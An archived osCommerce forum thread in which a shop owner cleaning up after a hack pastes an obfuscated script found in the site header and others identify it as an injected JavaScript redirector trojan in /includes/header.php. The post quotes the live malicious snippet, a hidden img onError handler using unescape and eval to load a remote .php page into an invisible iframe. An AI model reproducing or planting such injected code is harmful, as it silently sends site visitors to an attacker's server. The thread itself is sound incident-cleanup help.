Jump to content

Archived

This topic is now archived and is closed to further replies.

Tartanpig

Cleaning out after hack- Anyone recognise this code

Recommended Posts

I see this on the home page line 29 when I look at the source. I checked it out as their was a white box flashing up momentarily as the page loads. Does any one recognise it and know where it is residing?

 

[

 

 

 

div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8546" height="1" width="1"><img src="about:blank" onError='hlamtad=unescape("%27");xcjkk=eval("document.getElementById("+hlamtad+"ebajul"+hlamtad+").src=unescape("+hlamtad+"%68%74%74%70%3A%2F%2F"+hlamtad+")+document.getElementById("+hlamtad+"8546"+hlamtad+").id+unescape("+hlamtad+"%2E%69%6E%2F"+hlamtad+")+"+hlamtad+"1306058309"+hlamtad+"+unescape("+hlamtad+"%2E%70%68%70"+hlamtad+")");document.getElementById("ebajul").src=xcjkk' style="width:300;height:300;border:0px;"><iframe id="ebajul" src="about:blank"></iframe></div><!-- header_eof //--> ]

 

Share this post


Link to post
Share on other sites

There are no iframes in standard osC, anything that contains that or eval must be deemed suspect code


My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary

Share this post


Link to post
Share on other sites

My anti virus id's it as a java script redirector trojan horse.

 

Looks like it's at the end of the /includes/header.php file


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

My anti virus id's it as a java script redirector trojan horse.

 

Looks like it's at the end of the /includes/header.php file

 

 

 

Germ The bottom of the header was where it was right enough. Cleaned it out and trawling for more bad stuff. Thanks again Tartanpig

Share this post


Link to post
Share on other sites

Yes, definetely malware related to this attack:

 

blog.sucuri.net/2010/11/malware-update-inininininininin-in-and-oscommerce.html

sucuri.net/malware/malware-entry-mwjs431

 

Thanks,

Share this post


Link to post
Share on other sites

×